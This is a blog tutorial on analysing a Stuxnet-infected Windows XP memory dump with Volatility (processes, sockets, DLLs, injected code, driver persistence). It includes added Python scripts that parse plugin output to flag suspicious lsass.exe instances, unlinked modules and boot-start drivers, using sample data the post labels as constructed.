<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHLObLKvdHDwbBxWnrIHajMr42Sh2wjBa3UcuvE_6R1d_0tgne01UkAc6ddMp-l0QMXvdQ1V_o3SmcKZqObflNhUWAXi2f4TRGLrHPxa9uvrFxyLiQ1lraWQX4e4_8eevUIqvr1JmZhg/s1600/Stuxnet_II_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHLObLKvdHDwbBxWnrIHajMr42Sh2wjBa3UcuvE_6R1d_0tgne01UkAc6ddMp-l0QMXvdQ1V_o3SmcKZqObflNhUWAXi2f4TRGLrHPxa9uvrFxyLiQ1lraWQX4e4_8eevUIqvr1JmZhg/s640/Stuxnet_II_13.png" height="210" width="640" /></a></div>
<br />
<pre class="brush: java">python2 vol.py -f stuxnet.vmem printkey -K 'ControlSet001\Services\MrxCls'</pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8rfVcqXbxI3gadlYdrNV_04_YOYar5yNGieTQuAke0pXwfnKPa0hA6xpnLnklRelInEHPQyLfEWWxBBHWiCmXB45nJ9fMsPI7nexCUuweGC77dMuPoBs8G9gk85jvFoCsoovDghz5jU/s1600/Stuxnet_II_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8rfVcqXbxI3gadlYdrNV_04_YOYar5yNGieTQuAke0pXwfnKPa0hA6xpnLnklRelInEHPQyLfEWWxBBHWiCmXB45nJ9fMsPI7nexCUuweGC77dMuPoBs8G9gk85jvFoCsoovDghz5jU/s640/Stuxnet_II_14.png" height="232" width="640" /></a></div>
<br />
With these service keys, Stuxnet’s drivers are loaded again every time the computer restarts, which is how it persists across reboots.<br />
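<div style="text-align: justify;">
The procedure in this part (modscan to find the drivers, printkey to read their Services entries) can be automated once the plugin output is saved to text files. The Python 3 script below is an added example written for this post; it is not Volatility code and not part of the original article. It parses modscan and printkey output, decodes the Services Type and Start values, and reports every kernel driver that Windows would load again at boot (Start 0, 1 or 2) and that is not on a known-good baseline. The plugin outputs embedded in it are constructed for the example: the values shown for MrxNet and MrxCls, and the base address each driver sits at, are made up and were not read from the stuxnet.vmem dump.
</div>

```python
import re

# Service Type and Start values as stored under HKLM\SYSTEM\...\Services
SERVICE_TYPES = {1: "KERNEL_DRIVER", 2: "FILE_SYSTEM_DRIVER", 16: "WIN32_OWN_PROCESS", 32: "WIN32_SHARE_PROCESS"}
START_TYPES = {0: "BOOT_START", 1: "SYSTEM_START", 2: "AUTO_START", 3: "DEMAND_START", 4: "DISABLED"}
AUTOMATIC_STARTS = (0, 1, 2)  # loaded again by Windows on every boot without user action

# Constructed printkey/modscan output for this example. The values for MrxNet and
# MrxCls and the base each driver sits at are made up, not read from the dump.
SAMPLE_PRINTKEY = r"""Legend: (S) = Stable   (V) = Volatile

----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: MrxNet (S)
Values:
REG_DWORD     Type            : (S) 1
REG_DWORD     Start           : (S) 1
REG_EXPAND_SZ ImagePath       : (S) \??\C:\WINDOWS\system32\Drivers\mrxnet.sys
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: MrxCls (S)
Values:
REG_DWORD     Type            : (S) 1
REG_DWORD     Start           : (S) 1
REG_EXPAND_SZ ImagePath       : (S) \??\C:\WINDOWS\system32\Drivers\mrxcls.sys
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: Disk (S)
Values:
REG_DWORD     Type            : (S) 1
REG_DWORD     Start           : (S) 0
REG_EXPAND_SZ ImagePath       : (S) system32\DRIVERS\disk.sys
"""
SAMPLE_MODSCAN = r"""Offset(P)          Name                 Base               Size File
------------------ -------------------- ------------------ ------ ----
0x0000000001a4e2e0 mrxnet.sys           0xb21d8000         0x3000 \??\C:\WINDOWS\system32\Drivers\mrxnet.sys
0x0000000001a4f9e0 mrxcls.sys           0xf895a000         0x5000 \??\C:\WINDOWS\system32\Drivers\mrxcls.sys
0x0000000001b2d0a0 disk.sys             0xf86a3000         0x9000 \SystemRoot\system32\DRIVERS\disk.sys
"""
# Driver names vetted beforehand (hash-checked against a clean build); everything else is reported.
KNOWN_GOOD = {"disk.sys", "mrxsmb.sys", "mrxdav.sys"}

KEY_RE = re.compile(r"^Key name:\s+(\S+)", re.M)
VALUE_RE = re.compile(r"^(REG_\w+)\s+(\S+)\s+:\s+\([SV]\)\s*(.*)$", re.M)
MODSCAN_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\S+)\s+(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)\s+(\S.*)$", re.M)


def parse_printkey(text):
    """{key name: {value name: value}} for every key in concatenated printkey output."""
    keys = {}
    for block in re.split(r"^-{10,}\s*$", text, flags=re.M):
        km = KEY_RE.search(block)
        if not km:
            continue  # the legend chunk has no key
        values = {}
        for vtype, vname, raw in VALUE_RE.findall(block):
            values[vname] = int(raw) if vtype == "REG_DWORD" else raw.strip()
        keys[km.group(1)] = values
    return keys


def parse_modscan(text):
    """{image basename: (base, path)} for every module modscan carved out of memory."""
    return {name.lower(): (base, path.strip()) for _o, name, base, _s, path in MODSCAN_RE.findall(text)}


def driver_persistence(printkey_text, modscan_text, baseline=KNOWN_GOOD):
    """Drivers that a Services key makes Windows load at boot, minus the baseline."""
    loaded = parse_modscan(modscan_text)
    findings = []
    for key, vals in parse_printkey(printkey_text).items():
        stype, start = vals.get("Type"), vals.get("Start")
        image = vals.get("ImagePath", "")
        basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if stype not in (1, 2) or start not in AUTOMATIC_STARTS or basename in baseline:
            continue
        findings.append({
            "service": key,
            "type": SERVICE_TYPES.get(stype, str(stype)),
            "start": START_TYPES[start],
            "image": image,
            # None means the key is there but modscan did not see the driver in memory
            "loaded_base": loaded.get(basename, (None, None))[0],
        })
    return sorted(findings, key=lambda f: f["service"])


if __name__ == "__main__":
    for f in driver_persistence(SAMPLE_PRINTKEY, SAMPLE_MODSCAN):
        where = f["loaded_base"] or "NOT FOUND IN MEMORY"
        print("%(service)s: %(type)s, %(start)s, %(image)s, loaded at" % f, where)
```

<div style="text-align: justify;">
To run it against the real dump, save the output of the commands used above (`python2 vol.py -f stuxnet.vmem modscan` and `printkey -K 'ControlSet001\Services\MrxNet'`, one printkey run per key) to files and read those instead of the SAMPLE_ constants. A service key that says a driver must load at boot while modscan does not show it in memory, or the reverse, is worth a second look either way.
</div>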
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-76772068999995165832014-01-06T00:14:00.000-08:002014-01-12T02:34:54.984-08:00Stuxnet Trojan - Memory Forensics with Volatility | Part I<div style="text-align: justify;">
Stuxnet could be considered the first advanced malware of its kind. It is thought to have been developed by the United States and Israel to attack Iran's nuclear facilities. It attacked Windows systems using zero-day exploits and targeted SCADA systems in order to damage critical infrastructure... It could also spread through USB drives. Developing it would have required a team of highly capable programmers with deep knowledge of industrial processes and an interest in attacking industrial infrastructure.<br />
<br />
Kaspersky Lab concluded that the sophisticated attack could only have
been conducted "with nation-state support" and a study of the spread of
Stuxnet by Symantec says that it was spread to Iran (58.85%), Indonesia
(18.22%), India (8.31%), Azerbaijan (2.57%).... <br />
<br />
Thanks to the Malware Analyst's Cookbook, a memory dump from a host infected with this malware can be downloaded from the URL below: </div>
<br />
<a href="http://malwarecookbook.googlecode.com/svn/trunk/stuxnet.vmem.zip" target="_blank">http://malwarecookbook.googlecode.com/svn/trunk/stuxnet.vmem.zip</a><br />
<br />
Ok, let’s go. We are going to analyze it with Volatility.<br />
<h3>
STUXNET IMAGE INFO</h3>
<div style="text-align: justify;">
First of all we want to get more information about the memory image. With the command below we can see the profile Volatility suggests and when the image was acquired. In this case it was dumped on 2011-06-03.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem imageinfo</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcGCHAMCvB9wIxYPjuocBDLU-yoze-uCPXqo4HF8zW53XvPfb-ZFB5KbAFaq3-iZkfYCtg5zfkEFhdGritBriSxMBgEpCPPqrnYYNM_b1SGejHhubdO0l4tOf51CqCSzcsjM1yKA4buZo/s1600/Stuxnet_II_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcGCHAMCvB9wIxYPjuocBDLU-yoze-uCPXqo4HF8zW53XvPfb-ZFB5KbAFaq3-iZkfYCtg5zfkEFhdGritBriSxMBgEpCPPqrnYYNM_b1SGejHhubdO0l4tOf51CqCSzcsjM1yKA4buZo/s640/Stuxnet_II_1.png" height="230" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
It is good practice to export the suggested profile (WinXPSP3x86) as an environment variable so that it does not have to be passed to every Volatility command.</div>
<pre class="brush: java">export VOLATILITY_PROFILE=WinXPSP3x86</pre>
<h3>
DETECTING MALICIOUS PROCESS</h3>
<div style="text-align: justify;">
First of all, I usually want to know which processes were running on the computer when the memory was dumped.</div>
<br />
<div style="text-align: justify;">
Notice that three lsass.exe processes were running… That draws our attention.</div>
<br />
<ul>
<li>lsass.exe Pid 680</li>
<li>lsass.exe Pid 868</li>
<li>lsass.exe Pid 1928</li>
</ul>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem pslist</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwc6R9AOKGF926lcOlArS-GzntzZBVDzg2mmsgglcHYk9DZqhoynEX1vYNV0mmmt04G3ktv2AMFETjNef9cH_SvlKQAa8vfIi6M8e51lGqd81uwPkEzYN3VZifo7hNLO7Hb5myH-F9i0I/s1600/Stuxnet_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwc6R9AOKGF926lcOlArS-GzntzZBVDzg2mmsgglcHYk9DZqhoynEX1vYNV0mmmt04G3ktv2AMFETjNef9cH_SvlKQAa8vfIi6M8e51lGqd81uwPkEzYN3VZifo7hNLO7Hb5myH-F9i0I/s640/Stuxnet_2.png" height="467" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
We know that lsass.exe is one of the first processes to start when Windows boots, so it is normal for “lsass.exe” to have a low Pid. You can see when the three lsass.exe processes started in the picture above:</div>
<br />
<ul>
<li>Pid 680 started at 2010-10-29 17:08:54</li>
<li>Pid 868 started at 2011-06-03 04:26:55</li>
<li>Pid 1928 started at 2011-06-03 04:26:55</li>
</ul>
<br />
<ul>
</ul>
<div style="text-align: justify;">
The “lsass.exe” with the lower Pid (680) started in 2010, while the other two with higher Pids (868 and 1928) started in 2011. That is not normal behavior.</div>
<br />
<div style="text-align: justify;">
In the picture below we can see that winlogon.exe (Pid 624) started one of the “lsass.exe” processes (Pid 680). This is a really good indication of which “lsass.exe” is legitimate, because on Windows XP winlogon.exe is always the parent of the real “lsass.exe”. The “lsass.exe” processes with Pid 868 and 1928 were started by “services.exe” instead. That is not normal behavior, so they could be malicious processes.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem pstree | egrep '(services.exe|lsass.exe|winlogon.exe)'</pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWSXDgYC9NnSobdTzZDc_4sJVzKLqbw4dB9aJpOTehagCma7stQpyS0n2heoIGs0s1mjyUW3aaSlW-HslYg-peb9ZOPlQN32VcfVahuSowGu-HEaiZIaR3NHe98QnYoMd0Ge6aL_kFSU/s1600/Stuxnet_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWSXDgYC9NnSobdTzZDc_4sJVzKLqbw4dB9aJpOTehagCma7stQpyS0n2heoIGs0s1mjyUW3aaSlW-HslYg-peb9ZOPlQN32VcfVahuSowGu-HEaiZIaR3NHe98QnYoMd0Ge6aL_kFSU/s640/Stuxnet_3.png" height="68" width="640" /></a></div>
<br />
We have just discovered two suspicious processes.<br />
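<div style="text-align: justify;">
The reasoning of this section (one lsass.exe, parented by winlogon.exe on Windows XP, started at boot) can be turned into a check that runs over saved pslist output. The Python 3 script below is an added example written for this article, not Volatility code: it parses pslist rows and flags every lsass.exe whose parent is not winlogon.exe or which started long after winlogon.exe did. The pslist output it embeds is constructed; the Pids 624, 680, 868 and 1928 and their start times follow the screenshots, while the Pid of services.exe (668), the offsets and the thread and handle counts are made up.
</div>

```python
import re
from datetime import datetime

# Constructed pslist output for this example. Pids 624/680/868/1928 and the start
# times follow the article's screenshots; services.exe's Pid (668), offsets,
# thread and handle counts are made up.
SAMPLE_PSLIST = """Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x823c89c8 System                    4      0     59      403 ------      0
0x820df020 smss.exe                375      4      3       19 ------      0 2010-10-29 17:08:53 UTC+0000
0x821a2da0 csrss.exe               600    375     11      395      0      0 2010-10-29 17:08:54 UTC+0000
0x81da5650 winlogon.exe            624    375     19      570      0      0 2010-10-29 17:08:54 UTC+0000
0x82073020 services.exe            668    624     21      431      0      0 2010-10-29 17:08:54 UTC+0000
0x81e70020 lsass.exe               680    624     19      342      0      0 2010-10-29 17:08:54 UTC+0000
0x81fe52d8 explorer.exe           1196   1080     16      582      0      0 2010-10-29 17:11:49 UTC+0000
0x81c498c8 lsass.exe               868    668      2       23      0      0 2011-06-03 04:26:55 UTC+0000
0x81c47c00 lsass.exe              1928    668      4       65      0      0 2011-06-03 04:26:55 UTC+0000
"""

# offset, name, pid, ppid, thds, hnds, sess, wow64, optional start timestamp
ROW_RE = re.compile(
    r"^(0x[0-9a-fA-F]+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s+(\d+)"
    r"(?:\s+(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}))?"
)

# Windows XP: the real lsass.exe is started by winlogon.exe.
# On Vista and later the parent is wininit.exe instead; adjust before reusing this.
EXPECTED_PARENT = "winlogon.exe"
# A genuine lsass.exe appears within seconds of winlogon.exe; anything later than
# this many seconds was started after boot and deserves a look.
MAX_START_LAG = 120


def parse_pslist(text):
    """Map pid -> {name, ppid, start (datetime or None)} from pslist output."""
    procs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header, separator or blank line
        start = m.group(9)
        procs[int(m.group(3))] = {
            "name": m.group(2),
            "ppid": int(m.group(4)),
            "start": datetime.strptime(start, "%Y-%m-%d %H:%M:%S") if start else None,
        }
    return procs


def find_suspicious(procs, name="lsass.exe"):
    """Return {pid: [reasons]} for instances of `name` that break the XP boot model."""
    findings = {}
    winlogon_starts = [p["start"] for p in procs.values()
                       if p["name"].lower() == EXPECTED_PARENT and p["start"]]
    boot_ref = min(winlogon_starts) if winlogon_starts else None
    instances = [pid for pid, p in procs.items() if p["name"].lower() == name]
    for pid in instances:
        p = procs[pid]
        reasons = []
        parent = procs.get(p["ppid"])
        parent_name = parent["name"].lower() if parent else "<not in list>"
        if parent_name != EXPECTED_PARENT:
            reasons.append("parent is %s (pid %d), expected %s"
                           % (parent_name, p["ppid"], EXPECTED_PARENT))
        if boot_ref and p["start"] and (p["start"] - boot_ref).total_seconds() > MAX_START_LAG:
            reasons.append("started %s, long after winlogon.exe (%s)" % (p["start"], boot_ref))
        # the duplicate count alone does not say which copy is the impostor, so it is
        # only added as context to instances that already failed a check
        if reasons and len(instances) > 1:
            reasons.append("%d copies of %s running, only one expected" % (len(instances), name))
        if reasons:
            findings[pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(find_suspicious(parse_pslist(SAMPLE_PSLIST)).items()):
        print("lsass.exe pid %d is suspicious:" % pid)
        for r in reasons:
            print("  -", r)
```

<div style="text-align: justify;">
Save the real listing with `python2 vol.py -f stuxnet.vmem pslist > pslist.txt` and pass its contents to parse_pslist instead of SAMPLE_PSLIST. The same two checks (expected parent, start time relative to boot) work for the other system processes once EXPECTED_PARENT is changed.
</div>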
<h3>
DETECTING MALICIOUS CONNECTIONS</h3>
<div style="text-align: justify;">
It is really important to identify whether these suspicious processes were making connections. With the command below we can check it.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem connections</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipqY3x2vXeCa0Duk5gO43CmZpOxwXwX3A2f42RhYqz3d7u69wbmwGUp87h-JZSTZ0-vR7TW1jiZDlnzanrXFfJ10H6cMuNpz8pdOEVxJygpNM9zOd8KvdsB0181VPldq1v-WMGccrHA3E/s1600/Stuxnet_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipqY3x2vXeCa0Duk5gO43CmZpOxwXwX3A2f42RhYqz3d7u69wbmwGUp87h-JZSTZ0-vR7TW1jiZDlnzanrXFfJ10H6cMuNpz8pdOEVxJygpNM9zOd8KvdsB0181VPldq1v-WMGccrHA3E/s640/Stuxnet_4.png" height="58" width="640" /></a></div>
<br />
No connections were established when the memory was dumped. Now we are going to look at the ports the computer was listening on.<br />
<br />
<div style="text-align: justify;">
In the picture below you will see that the “lsass.exe” with Pid 680 is bound to ports 500 and 4500 (IKE and IPsec NAT-T), while the “lsass.exe” with Pid 868 and the one with Pid 1928 are not listening on these ports. Again, the “lsass.exe” with Pid 680 looks normal, because the real process usually listens on those ports.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem sockets</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBdoLvyCnf2LjnmS1nUXZvkyOwU5LfZF_jqQJI72wF6shnm_Lr8iKKGka4r2z6HSNd79zyXTW7MLbZNa335C3SvKGsKwWOHl6kzWmz1NygvRkyVyTiTNOC3rY2hyphenhyphenHPIWt5ngtB3V9d2M/s1600/Stuxnet_04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBdoLvyCnf2LjnmS1nUXZvkyOwU5LfZF_jqQJI72wF6shnm_Lr8iKKGka4r2z6HSNd79zyXTW7MLbZNa335C3SvKGsKwWOHl6kzWmz1NygvRkyVyTiTNOC3rY2hyphenhyphenHPIWt5ngtB3V9d2M/s640/Stuxnet_04.png" height="238" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h3>
DETECTING DLL</h3>
<div style="text-align: justify;">
The “lsass.exe” process with Pid 680 appears to be a normal process… What about the other ones?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With the commands below we can check that the “lsass.exe” processes with Pid 868 and Pid 1928 have loaded far fewer DLLs than the real one.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem dlllist -p 680 | wc -l
python2 vol.py -f stuxnet.vmem dlllist -p 868 | wc -l
python2 vol.py -f stuxnet.vmem dlllist -p 1928 | wc -l</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfb7MW57FiOXgnlqrLPYt7cXK47a0uPdZDlCeEz9tj0CNW1yRbwB9obucqTV58OkhOG226YvTuv39818zaK3lgtXXUux70E6Ht0wIT0IIL9JQn47Wi7HdYo1fAbHfT349JENdJ5-tJy3I/s1600/Stuxnet_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfb7MW57FiOXgnlqrLPYt7cXK47a0uPdZDlCeEz9tj0CNW1yRbwB9obucqTV58OkhOG226YvTuv39818zaK3lgtXXUux70E6Ht0wIT0IIL9JQn47Wi7HdYo1fAbHfT349JENdJ5-tJy3I/s640/Stuxnet_6.png" height="112" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<span id="goog_1753205994">We can also detect that the process with Pid 1928 has unlinked DLLs.</span><br />
<pre class="brush: java">python2 vol.py -f stuxnet.vmem ldrmodules -p 1928</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x4qj_osc-hfFee3gplZI0k5w-u6yWtt0_3VIYiXddYeTiNB6jfxze84Nxs8LwBXKcNGYHL120xUENSTQ1oYfJ9nmrAZ1tBsd3tD9vpXxG5fbOu6sZ0yoM8lhXgL5IamMNAFpU3ZE9E0/s1600/Stuxnet_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x4qj_osc-hfFee3gplZI0k5w-u6yWtt0_3VIYiXddYeTiNB6jfxze84Nxs8LwBXKcNGYHL120xUENSTQ1oYfJ9nmrAZ1tBsd3tD9vpXxG5fbOu6sZ0yoM8lhXgL5IamMNAFpU3ZE9E0/s640/Stuxnet_7.png" height="246" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<span id="goog_1753205994">We can get more information about it with this command.</span><br />
<pre class="brush: java">python2 vol.py -f stuxnet.vmem ldrmodules -p 1928 -v</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMGRgqxQCJkpOiratsO36CdZe0MVc1jk_R-J351kCOBqIsa2vQ3nW6D1dgcg4dvfp67qXg4CXA5ilUnzzCfLJWgOluYCU4sGO28jxbid-LQD5ionZn7Ge4meNqmeeNSF3JsdoCRgW5F9c/s1600/Stuxnet_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMGRgqxQCJkpOiratsO36CdZe0MVc1jk_R-J351kCOBqIsa2vQ3nW6D1dgcg4dvfp67qXg4CXA5ilUnzzCfLJWgOluYCU4sGO28jxbid-LQD5ionZn7Ge4meNqmeeNSF3JsdoCRgW5F9c/s640/Stuxnet_8.png" height="64" width="640" /></a></div>
<br />
<span id="goog_1753205994">These unlinked modules are directly related to the Stuxnet worm. See the URL below:</span><br />
<span id="goog_1753205994"><br /><a href="http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml" target="_blank">http://www.f-secure.com/v-descs/trojan-dropper_w32_stuxnet.shtml</a></span><br />
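<div style="text-align: justify;">
A module that ldrmodules shows as False in all three PEB lists while it is still mapped in the process is the signature of an unlinked or manually mapped DLL. The Python 3 script below is an added example written for this article, not Volatility code: it parses ldrmodules output and reports those rows, and it deliberately skips the one benign case every analyst runs into, the process's own executable, which is never in the InInit list. The ldrmodules output embedded in it is constructed for the example; the bases and the paths other than lsass.exe's own are invented, not taken from the dump.
</div>

```python
import re

# Constructed ldrmodules output for this example (bases and DLL paths invented,
# not copied from the stuxnet.vmem dump).
SAMPLE_LDRMODULES = r"""Pid      Process              Base       InLoad InInit InMem MappedPath
-------- -------------------- ---------- ------ ------ ----- ----------
    1928 lsass.exe            0x01000000 True   False  True  \WINDOWS\system32\lsass.exe
    1928 lsass.exe            0x7c900000 True   True   True  \WINDOWS\system32\ntdll.dll
    1928 lsass.exe            0x7c800000 True   True   True  \WINDOWS\system32\kernel32.dll
    1928 lsass.exe            0x00080000 False  False  False \WINDOWS\system32\injected.dll
    1928 lsass.exe            0x00d80000 True   True   False \WINDOWS\system32\wshtcpip.dll
"""

# pid, process, base, InLoad, InInit, InMem, mapped path
ROW_RE = re.compile(
    r"^\s*(\d+)\s+(\S+)\s+(0x[0-9a-fA-F]+)\s+(True|False)\s+(True|False)\s+(True|False)\s*(.*?)\s*$"
)
LISTS = ("InLoad", "InInit", "InMem")  # the three PEB module lists ldrmodules compares


def parse_ldrmodules(text):
    """One dict per module row; flags is (InLoad, InInit, InMem) as booleans."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header or separator
        rows.append({
            "pid": int(m.group(1)),
            "process": m.group(2),
            "base": m.group(3),
            "flags": tuple(m.group(i) == "True" for i in (4, 5, 6)),
            "path": m.group(7),
        })
    return rows


def is_main_executable(row):
    """The process image itself is never in the InInit list; that is normal, not hiding."""
    inload, ininit, inmem = row["flags"]
    return inload and inmem and not ininit and row["path"].lower().endswith("\\" + row["process"].lower())


def find_unlinked(text):
    """Rows mapped in the process but missing from one or more PEB lists."""
    findings = []
    for row in parse_ldrmodules(text):
        if all(row["flags"]) or is_main_executable(row):
            continue
        missing = [name for name, present in zip(LISTS, row["flags"]) if not present]
        if not any(row["flags"]):
            verdict = "mapped image absent from all PEB lists (unlinked or manually mapped)"
        else:
            verdict = "missing from " + ", ".join(missing)
        findings.append({"pid": row["pid"], "base": row["base"], "path": row["path"], "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in find_unlinked(SAMPLE_LDRMODULES):
        print("pid %(pid)d %(base)s %(path)s: %(verdict)s" % f)
```

<div style="text-align: justify;">
Run `python2 vol.py -f stuxnet.vmem ldrmodules -p 1928 > ldr.txt` and pass the file contents to find_unlinked. Anything it reports is a candidate for dumping with dlldump (by base address) and hashing, exactly as done for the malfind regions in the next section.
</div>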
<h3>
<span id="goog_1753205994">DETECTING INJECTED CODE</span></h3>
<div style="text-align: justify;">
<span id="goog_1753205994"></span><span id="goog_1753205994"><span id="goog_1753205994">The malfind command helps us find hidden or injected code and DLLs in user-mode memory. Next we are going to dump those regions and upload them to www.virustotal.com in order to check whether any anti-virus detects them.</span></span></div>
<br />
<div style="text-align: justify;">
<span id="goog_1753205994"><span id="goog_1753205994">We already know that the process </span></span><span id="goog_1753205994"><span id="goog_1753205994">with PID 680 is normal. For this reason we will continue with the other ones.</span></span></div>
<div style="text-align: justify;">
<pre class="brush: java">python2 vol.py -f stuxnet.vmem malfind -p 868 --dump-dir evidences/</pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp2nBlN0A_bx6MZ8Rl_qxV-GxWarZnblsTJE-ILoUVNnt5fyPy0E-hRfO3OoLyEjvT_TPveui0xtu2wE465QJMpOWk4PqP8Ujnfk5blP8cmGZsgbJ3BTCdSd5e8aG-8Zzp25sxot_-lwI/s1600/Stuxnet_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp2nBlN0A_bx6MZ8Rl_qxV-GxWarZnblsTJE-ILoUVNnt5fyPy0E-hRfO3OoLyEjvT_TPveui0xtu2wE465QJMpOWk4PqP8Ujnfk5blP8cmGZsgbJ3BTCdSd5e8aG-8Zzp25sxot_-lwI/s640/Stuxnet_10.png" height="234" width="640" /></a></div>
<div style="text-align: justify;">
<br />
<span id="goog_1753205994">We can see two files have been created. We continue doing the same with the “lsass.exe” process with Pid 1928.</span></div>
<div style="text-align: justify;">
<pre class="brush: java">python2 vol.py -f stuxnet.vmem malfind -p 1928 --dump-dir evidences/</pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNyacC1CxKdTy3VIIbL2NK33ISL6MuizpGemHvyJKhBg-XjSxPXjqNB_1nkg01kGbzH5Gzgk_yfHvTJcykJmLp_mXIck8PvhDXbMjJ1c7BDrDwV7cu9JFQX5881zzHXZ83VFgzFw6EsZg/s1600/Stuxnet_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNyacC1CxKdTy3VIIbL2NK33ISL6MuizpGemHvyJKhBg-XjSxPXjqNB_1nkg01kGbzH5Gzgk_yfHvTJcykJmLp_mXIck8PvhDXbMjJ1c7BDrDwV7cu9JFQX5881zzHXZ83VFgzFw6EsZg/s640/Stuxnet_13.png" height="214" width="640" /></a></div>
<span id="goog_1753205994"></span><br />
<div style="text-align: justify;">
<span id="goog_1753205994"><span id="goog_1753205994">The next step is to check these files on www.virustotal.com to see whether any anti-virus vendor detects them as malicious. Rather than uploading the files themselves, we obtain their sha256 checksums and then search for the hashes on the VirusTotal website.</span></span><br />
<pre class="brush: java">sha256sum *.dmp</pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
